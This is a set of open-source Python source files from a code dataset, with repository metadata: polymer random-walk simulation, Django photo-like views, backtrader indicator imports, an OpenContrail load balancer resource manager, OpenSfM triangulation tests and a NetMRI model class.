traj = kwargs.get('traj', True)
pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
for m_ in m:
m_.add_particle_bonding()
for p in m_.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m_.remove_linker_types()
if s_ is None:
s = system.replicate(m[0], 1, density=density/nmon)
else:
s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
for p in s.particles:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
for m_ in m:
if capped:
m_.particles.remove(1)
m_.remove_spare_bonding()
m_.add_particle_bonding()
s.add_particle_bonding()
if traj:
s.write_xyz('random_walk.xyz')
temp_nmon = 1
while True:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
if temp_nmon == 1 and p_ == 1:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
elif temp_nmon == 1:
p_ -= 1
for insert in range(p_):
head = None
tail = None
backbone_vector = np.array([last_head.x - last_tail.x,
last_head.y - last_tail.y,
last_head.z - last_tail.z])
ref_head = None
ref_tail = None
for p in m_.particles:
if p.linker == 'head':
ref_head = p
elif p.linker == 'tail':
ref_tail = p
if ref_head and ref_tail:
ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
ref_head.y - ref_tail.y,
ref_head.z - ref_tail.z])
rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
translation_vector = [last_tail.x - ref_tail.x,
last_tail.y - ref_tail.y,
last_tail.z - ref_tail.z]
for p in m_.particles:
p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
else:
print('reference molecule has no head or tail')
n = m_.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
s.add(n, change_dim=False)
s.add_particle_bonding()
head = last_head
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
s.make_new_bonds(head, tail, f)
temp_nmon += 1
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
if unwrap:
s.unwrap()
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (temp_nmon)
sim.run(np=settings.get('np'))
if unwrap:
s.unwrap()
if unwrap:
s.wrap()
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
if temp_nmon >= nmon:
break
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
def random_walk(m, nmon, s_=None, **kwargs):
m = m.copy()
extra_bonds = kwargs.get('extra_bonds', False)
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
m.add_particle_bonding()
for p in m.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m.remove_linker_types()
if s_ is None:
s = system.replicate(m, 1, density=density/nmon)
else:
s = system.replicate(m, 1, s_=s_, density=None)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
if traj:
s.write_xyz('random_walk.xyz')
if capped:
m.particles.remove(1)
m.remove_spare_bonding()
m.add_particle_bonding()
for insertion in range(nmon - 1):
head = None
tail = None
backbone_vector = np.array(find_last_backbone_vector(s, m))
for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
p_.x = p.x + 3*backbone_vector[0]
p_.y = p.y + 3*backbone_vector[1]
p_.z = p.z + 3*backbone_vector[2]
n = m.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
if extra_bonds:
heads = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
heads.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
head = p
s.add(n, change_dim=False)
s.add_particle_bonding()
if extra_bonds:
tails = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tails.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
for p in s.particles:
if not p.bonded_to:
print(p.tag)
if head and tail:
s.make_new_bonds(head, tail, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
elif extra_bonds and len(heads) == len(tails):
for h, t in izip(heads, tails):
s.make_new_bonds(h, t, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
else:
print('cannot find head and tail')
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (insertion+2)
sim.run(np=settings.get('np'))
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
| true | true |
f72eb557881c37baab88b43f249c035716e84b5c | 963 | py | Python | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
if request.method == 'GET':
photos = Photo.objects.all().order_by('unsplash_id')
return JsonResponse(list(map(lambda p: p.to_dict(), photos)), safe=False)
return HttpResponseNotAllowed
@csrf_exempt
def like_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_like()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
@csrf_exempt
def dislike_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_dislike()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
| 26.75 | 81 | 0.687435 | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
if request.method == 'GET':
photos = Photo.objects.all().order_by('unsplash_id')
return JsonResponse(list(map(lambda p: p.to_dict(), photos)), safe=False)
return HttpResponseNotAllowed
@csrf_exempt
def like_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_like()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
@csrf_exempt
def dislike_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_dislike()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
| true | true |
f72eb561be479318fbf20e59f9be7488fc76b552 | 221 | py | Python | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | 20 | 2021-12-31T15:28:20.000Z | 2022-02-15T18:24:16.000Z | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | from enum import Enum, auto
class Constraints(Enum):
not_empty = auto()
greater_than_0 = auto()
not_null = auto()
is_email = auto()
is_uri = auto()
after_now = auto()
before_now = auto()
| 18.416667 | 27 | 0.606335 | from enum import Enum, auto
class Constraints(Enum):
not_empty = auto()
greater_than_0 = auto()
not_null = auto()
is_email = auto()
is_uri = auto()
after_now = auto()
before_now = auto()
| true | true |
f72eb585890bafe8941f0c78a9d950477be13230 | 2,555 | py | Python | backtrader/backtrader/indicators/__init__.py | harshabakku/live-back-testing-trader | 1fd69c7598dc15bea740f160eed886f396bcba2c | [
"MIT"
] | 1 | 2021-07-14T22:04:08.000Z | 2021-07-14T22:04:08.000Z | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | null | null | null | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | 3 | 2021-03-07T16:29:40.000Z | 2022-03-17T21:42:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015, 2016, 2017 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader import Indicator
from backtrader.functions import *
# The modules below should/must define __all__ with the Indicator objects
# of prepend an "_" (underscore) to private classes/variables
from .basicops import *
# base for moving averages
from .mabase import *
# moving averages (so envelope and oscillators can be auto-generated)
from .sma import *
from .ema import *
from .smma import *
from .wma import *
from .dema import *
from .kama import *
from .zlema import *
from .hma import *
from .zlind import *
from .dma import *
# depends on moving averages
from .deviation import *
# depend on basicops, moving averages and deviations
from .atr import *
from .aroon import *
from .bollinger import *
from .cci import *
from .crossover import *
from .dpo import *
from .directionalmove import *
from .envelope import *
from .heikinashi import *
from .lrsi import *
from .macd import *
from .momentum import *
from .oscillator import *
from .percentchange import *
from .percentrank import *
from .pivotpoint import *
from .prettygoodoscillator import *
from .priceoscillator import *
from .psar import *
from .rsi import *
from .stochastic import *
from .trix import *
from .tsi import *
from .ultimateoscillator import *
from .williams import *
from .rmi import *
from .awesomeoscillator import *
from .accdecoscillator import *
from .dv2 import * # depends on percentrank
# Depends on Momentum
from .kst import *
from .ichimoku import *
from .hurst import *
from .ols import *
from .hadelta import *
| 28.076923 | 79 | 0.699413 | true | true | |
f72eb6919b6ff61569dadd031bc009867b1f62b7 | 8,984 | py | Python | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
_max_project_read_attempts = 3
def __init__(self, api):
self._api = api
@abstractproperty
def property_type_mapping(self):
""" Mapping from property name to neutron dict key.
"""
pass
@abstractmethod
def make_properties(self, resource):
""" Returns the properties for the specified resource.
"""
pass
@abstractmethod
def make_dict(self, resource, fields):
""" Return the contrail api resource in the dictionary format
expected by neutron.
"""
pass
@abstractmethod
def resource_read(self, id):
""" Read the specified resource from the api server.
"""
pass
@abstractmethod
def resource_list(self, tenant_id):
""" Returns the list of objects from the api server.
"""
pass
@abstractmethod
def resource_update(self, obj):
""" Call the update method.
"""
pass
@abstractmethod
def resource_delete(self, id):
""" Delete the specified resource from the api server.
"""
pass
@abstractproperty
def get_exception_notfound(self, id):
""" Returns the correct NotFound exception.
"""
pass
@abstractproperty
def get_exception_inuse(self, id):
""" Returns the correct NotFound exception.
"""
pass
@abstractproperty
def neutron_name(self):
""" Resource name in a request from neutron.
"""
pass
@abstractproperty
def resource_name_plural(self):
""" Resource list name in a list response from api server.
"""
pass
@abstractmethod
def create(self, context, resource):
""" Create resource.
"""
pass
@abstractmethod
def update_properties(self, obj, id, resource):
""" Update the resource properties
"""
return False
def update_object(self, obj, id, resource):
""" Update object metadata other than properties
"""
return False
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = 'Cannot create resource for another tenant'
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_resource_name(self, resource, parent, name, uuid):
""" Generate an unique name. This is display name if there are
no conflicts or display_name + uuid.
"""
fq_name = list(parent.fq_name)
fq_name.append(name)
try:
obj = self._api.fq_name_to_id(resource, fq_name)
except NoIdError:
return name
return name + '-' + uuid
def _is_authorized(self, context, resource):
return context.is_admin or context.tenant_id == resource['tenant_id']
def _project_read(self, project_id):
""" Reads the project from the api server. The project will be
created it does not yet exist.
"""
for i in range(self._max_project_read_attempts):
try:
return self._api.project_read(id=str(uuid.UUID(project_id)))
except NoIdError:
pass
greenthread.sleep(1)
raise n_exc.TenantNetworksDisabled()
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _apply_filter(self, resource, filters):
if filters is None:
return True
for key, value in filters.iteritems():
if key in resource and not resource[key] in value:
return False
return True
def _get_object_status(self, obj):
id_perms = obj.get_id_perms()
if id_perms and id_perms.enable:
return constants.ACTIVE
return constants.PENDING_DELETE
def _get_object_description(self, obj):
id_perms = obj.get_id_perms()
if id_perms is None:
return None
return id_perms.description
def _get_object_tenant_id(self, obj):
proj_fq_name = obj.get_fq_name()[0:2]
try:
proj = self._api.project_read(fq_name=proj_fq_name)
except NoIdError:
return None
return proj.uuid
def get_resource(self, context, id, fields=None):
""" Implement GET by uuid.
"""
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if not context.is_admin and tenant_id != project_id:
raise self.get_exception_notfound(id=id)
return self.make_dict(obj, fields)
def _get_resource_dict(self, uuid, filters, fields):
try:
obj = self.resource_read(id=uuid)
except NoIdError:
return None
res = self.make_dict(obj, None)
if not self._apply_filter(res, filters):
return None
return self._fields(res, fields)
def get_collection(self, context, filters=None, fields=None):
""" Generic implementation of list command.
"""
response = []
if filters and 'id' in filters:
for v in filters['id']:
res = self._get_resource_dict(v, filters, fields)
if res is not None and self._is_authorized(context, res):
response.append(res)
return response
tenant_id = None
if not context.is_admin:
tenant_id = context.tenant_id
obj_list = self.resource_list(tenant_id=tenant_id)
if self.resource_name_plural not in obj_list:
return response
for v in obj_list[self.resource_name_plural]:
res = self._get_resource_dict(v['uuid'], filters, fields)
if res is not None:
response.append(res)
return response
def delete(self, context, id):
if not context.is_admin:
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if tenant_id != project_id:
raise n_exc.NotAuthorized()
try:
self.resource_delete(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
except RefsExistError:
raise self.get_exception_inuse(id=id)
def update_properties_subr(self, props, resource):
""" Update the DB properties object from the neutron parameters.
"""
change = False
for key, mapping in self.property_type_mapping.iteritems():
if mapping not in resource:
continue
if getattr(props, key) != resource[mapping]:
setattr(props, key, resource[mapping])
change = True
return change
def update(self, context, id, resource):
""" Update the resource.
"""
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
id_perms = obj.get_id_perms()
if not id_perms or not id_perms.enable:
raise loadbalancer.StateInvalid(id=id,
state=constants.PENDING_DELETE)
r = resource[self.neutron_name]
if r:
update = False
if 'description' in r and id_perms.description != r['description']:
id_perms.description = r['description']
obj.set_id_perms(id_perms)
update = True
if self.update_properties(obj, id, r):
update = True
if self.update_object(obj, id, r):
update = True
if update:
self.resource_update(obj)
return self.make_dict(obj)
| 30.662116 | 79 | 0.598508 |
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
_max_project_read_attempts = 3
def __init__(self, api):
self._api = api
@abstractproperty
def property_type_mapping(self):
pass
@abstractmethod
def make_properties(self, resource):
pass
@abstractmethod
def make_dict(self, resource, fields):
pass
@abstractmethod
def resource_read(self, id):
pass
@abstractmethod
def resource_list(self, tenant_id):
pass
@abstractmethod
def resource_update(self, obj):
pass
@abstractmethod
def resource_delete(self, id):
pass
@abstractproperty
def get_exception_notfound(self, id):
pass
@abstractproperty
def get_exception_inuse(self, id):
pass
@abstractproperty
def neutron_name(self):
pass
@abstractproperty
def resource_name_plural(self):
pass
@abstractmethod
def create(self, context, resource):
pass
@abstractmethod
def update_properties(self, obj, id, resource):
return False
def update_object(self, obj, id, resource):
return False
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = 'Cannot create resource for another tenant'
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_resource_name(self, resource, parent, name, uuid):
fq_name = list(parent.fq_name)
fq_name.append(name)
try:
obj = self._api.fq_name_to_id(resource, fq_name)
except NoIdError:
return name
return name + '-' + uuid
def _is_authorized(self, context, resource):
return context.is_admin or context.tenant_id == resource['tenant_id']
def _project_read(self, project_id):
for i in range(self._max_project_read_attempts):
try:
return self._api.project_read(id=str(uuid.UUID(project_id)))
except NoIdError:
pass
greenthread.sleep(1)
raise n_exc.TenantNetworksDisabled()
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _apply_filter(self, resource, filters):
if filters is None:
return True
for key, value in filters.iteritems():
if key in resource and not resource[key] in value:
return False
return True
def _get_object_status(self, obj):
id_perms = obj.get_id_perms()
if id_perms and id_perms.enable:
return constants.ACTIVE
return constants.PENDING_DELETE
def _get_object_description(self, obj):
id_perms = obj.get_id_perms()
if id_perms is None:
return None
return id_perms.description
def _get_object_tenant_id(self, obj):
proj_fq_name = obj.get_fq_name()[0:2]
try:
proj = self._api.project_read(fq_name=proj_fq_name)
except NoIdError:
return None
return proj.uuid
def get_resource(self, context, id, fields=None):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if not context.is_admin and tenant_id != project_id:
raise self.get_exception_notfound(id=id)
return self.make_dict(obj, fields)
def _get_resource_dict(self, uuid, filters, fields):
try:
obj = self.resource_read(id=uuid)
except NoIdError:
return None
res = self.make_dict(obj, None)
if not self._apply_filter(res, filters):
return None
return self._fields(res, fields)
def get_collection(self, context, filters=None, fields=None):
response = []
if filters and 'id' in filters:
for v in filters['id']:
res = self._get_resource_dict(v, filters, fields)
if res is not None and self._is_authorized(context, res):
response.append(res)
return response
tenant_id = None
if not context.is_admin:
tenant_id = context.tenant_id
obj_list = self.resource_list(tenant_id=tenant_id)
if self.resource_name_plural not in obj_list:
return response
for v in obj_list[self.resource_name_plural]:
res = self._get_resource_dict(v['uuid'], filters, fields)
if res is not None:
response.append(res)
return response
def delete(self, context, id):
if not context.is_admin:
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if tenant_id != project_id:
raise n_exc.NotAuthorized()
try:
self.resource_delete(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
except RefsExistError:
raise self.get_exception_inuse(id=id)
def update_properties_subr(self, props, resource):
change = False
for key, mapping in self.property_type_mapping.iteritems():
if mapping not in resource:
continue
if getattr(props, key) != resource[mapping]:
setattr(props, key, resource[mapping])
change = True
return change
def update(self, context, id, resource):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
id_perms = obj.get_id_perms()
if not id_perms or not id_perms.enable:
raise loadbalancer.StateInvalid(id=id,
state=constants.PENDING_DELETE)
r = resource[self.neutron_name]
if r:
update = False
if 'description' in r and id_perms.description != r['description']:
id_perms.description = r['description']
obj.set_id_perms(id_perms)
update = True
if self.update_properties(obj, id, r):
update = True
if self.update_object(obj, id, r):
update = True
if update:
self.resource_update(obj)
return self.make_dict(obj)
| true | true |
f72eb75b52c1111f421c3e6bb21b6e69eee64a93 | 2,707 | py | Python | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | null | null | null | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | 3 | 2021-06-08T22:22:02.000Z | 2022-03-12T00:47:52.000Z | opensfm/test/test_triangulation.py | smarvar/sfm_smarvar | 569144c26df860cfa45d183f7701d0414e35d086 | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
"""Test triangulating tracks of spherical images."""
tracks_manager = pysfm.TracksManager()
tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
rec = io.reconstruction_from_json({
"cameras": {
"theta": {
"projection_type": "equirectangular",
"width": 800,
"height": 400,
}
},
"shots": {
'im1': {
"camera": "theta",
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
'im2': {
"camera": "theta",
"rotation": [0, 0, 0.0],
"translation": [-1, 0, 0.0],
},
},
"points": {
},
})
triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
triangulator.triangulate('1', 0.01, 2.0)
assert '1' in rec.points
p = rec.points['1'].coordinates
assert np.allclose(p, [0, 0, 1.3763819204711])
assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
return np.array(x) / np.linalg.norm(x)
def test_triangulate_bearings_dlt():
rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
b1 = unit_vector([0.0, 0, 1])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_dlt(
[rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_midpoint(
[o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_two_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
assert np.allclose(X, [0, 0, 1.0])
| 30.41573 | 91 | 0.569634 | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
tracks_manager = pysfm.TracksManager()
tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
rec = io.reconstruction_from_json({
"cameras": {
"theta": {
"projection_type": "equirectangular",
"width": 800,
"height": 400,
}
},
"shots": {
'im1': {
"camera": "theta",
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
'im2': {
"camera": "theta",
"rotation": [0, 0, 0.0],
"translation": [-1, 0, 0.0],
},
},
"points": {
},
})
triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
triangulator.triangulate('1', 0.01, 2.0)
assert '1' in rec.points
p = rec.points['1'].coordinates
assert np.allclose(p, [0, 0, 1.3763819204711])
assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
return np.array(x) / np.linalg.norm(x)
def test_triangulate_bearings_dlt():
rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
b1 = unit_vector([0.0, 0, 1])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_dlt(
[rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_midpoint(
[o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_two_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
assert np.allclose(X, [0, 0, 1.0])
| true | true |
f72eb7cef44043a2b1295eb4b8935af5db17e752 | 1,064 | py | Python | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 12 | 2016-02-19T12:37:54.000Z | 2022-03-04T20:11:08.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2015-11-12T18:37:00.000Z | 2021-05-19T07:59:55.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2016-01-07T12:04:34.000Z | 2022-03-31T11:05:41.000Z | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
"""
| ``id:`` none
| ``attribute type:`` string
| ``DeviceID:`` none
| ``attribute type:`` string
| ``DataSourceID:`` none
| ``attribute type:`` string
| ``ipaddress:`` none
| ``attribute type:`` string
| ``ListenAddr:`` none
| ``attribute type:`` string
| ``PortProtocol:`` none
| ``attribute type:`` string
| ``Port:`` none
| ``attribute type:`` string
| ``ExpectedService:`` none
| ``attribute type:`` string
| ``Service:`` none
| ``attribute type:`` string
| ``PortTimestamp:`` none
| ``attribute type:`` string
"""
properties = ("id",
"DeviceID",
"DataSourceID",
"ipaddress",
"ListenAddr",
"PortProtocol",
"Port",
"ExpectedService",
"Service",
"PortTimestamp",
)
| 20.461538 | 54 | 0.470865 | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
properties = ("id",
"DeviceID",
"DataSourceID",
"ipaddress",
"ListenAddr",
"PortProtocol",
"Port",
"ExpectedService",
"Service",
